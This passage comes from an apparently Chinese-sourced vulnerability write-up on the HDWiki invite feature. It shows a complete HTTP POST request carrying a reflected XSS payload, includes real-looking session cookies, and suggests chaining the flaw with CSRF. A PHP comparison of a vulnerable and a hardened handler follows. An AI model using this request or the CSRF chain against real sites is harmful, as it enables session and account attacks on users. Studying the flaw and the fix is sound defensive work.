Arbitrary file download succeeded.
0x08 Front-end POST reflected XSS in the doinvite method of /control/user.php.
As shown in the figure:
We have to find a way to get $error set to true so that execution reaches the assignment branch below it.
So here our input must fail to match preg_match("/^[w-.]+@[w-.]+(.w+)+$/", $mail); that takes us into the branch at lines 757-758, where ps is output directly into the front-end template without any XSS filtering, producing a reflected XSS. Construct the HTTP request:
POST /index.php?user-invite HTTP/1.1
Host: hdwiki.com
Content-Length: 84
Cache-Control: max-age=0
Origin:
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=vpshfq0gnjkf2ko4qdeoaqcjp5; hd_sid=ESCfTk; hd_auth=993bRToK8dVihewqdijd2tsF5fc%2Bcc%2BW8%2FRFsM2MTMtfM%2FJflKkLfGvB2FkvbPl7JhocdUIHk%2B%2F7YqGs5Y9w; hd_querystring=admin_db-downloadfile-%2A%2A%2F%2A%2A%2Frobots%2Atxt
Connection: close
toemails=1&ps=<script>alert(1);</script>&submit=%E5%8F%91%E9%80%81%E9%82%80%E8%AF%B7
This POST-based reflected XSS can be chained with CSRF for a combined attack.
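To make the bug class concrete from the defender's side, here is an added PHP illustration (not HDWiki's code) of an invite handler in the vulnerable shape described above, next to a hardened version that encodes the re-displayed field and ties the POST to a session CSRF token. The variable names $mail, $ps and $error follow the write-up; the function names, the error message text and the token plumbing are assumptions.

```php
<?php
// Hypothetical handler, not HDWiki's own code: on a failed address check the
// user's message is re-displayed, which is exactly the branch the write-up abuses.

// Vulnerable shape: the untrusted POST field $ps is interpolated into HTML
// verbatim on the error branch, so <script>alert(1);</script> executes.
function render_invite_error_vulnerable(string $mail, string $ps): string
{
    // Deliberately loose pattern, mirroring the kind of check that sets $error.
    $error = !preg_match('/^[\w\-.]+@[\w\-.]+(\.\w+)+$/', $mail);
    if (!$error) {
        return 'ok';
    }
    return '<p>Invalid address. Your message was: ' . $ps . '</p>';
}

// Hardened shape: same branch, but the value is HTML-encoded before it reaches
// the template, the address is validated with filter_var, and the state-changing
// POST is rejected unless it carries the per-session CSRF token.
function render_invite_error_hardened(string $mail, string $ps, string $token, string $sessionToken): string
{
    // hash_equals prevents timing leaks when comparing the token (assumed to
    // have been generated with random_bytes() and stored in the session).
    if ($sessionToken === '' || !hash_equals($sessionToken, $token)) {
        return 'forbidden';
    }
    $error = filter_var($mail, FILTER_VALIDATE_EMAIL) === false;
    if (!$error) {
        return 'ok';
    }
    // ENT_QUOTES also encodes single quotes so the value is safe inside attributes.
    $safePs = htmlspecialchars($ps, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<p>Invalid address. Your message was: ' . $safePs . '</p>';
}

// Constructed input mirroring the request body in the write-up (toemails=1, ps=<script>...).
$ps = '<script>alert(1);</script>';
echo render_invite_error_vulnerable('1', $ps), PHP_EOL;          // script tag reaches the page
echo render_invite_error_hardened('1', $ps, 'tok', 'tok'), PHP_EOL; // &lt;script&gt;... rendered as text
echo render_invite_error_hardened('1', $ps, 'bad', 'tok'), PHP_EOL; // forbidden: CSRF token mismatch
```

A detection note: the hardened handler makes the forged cross-site POST fail at the token check, so the same request in a web-server log would show up as a rejected invite rather than a rendered page.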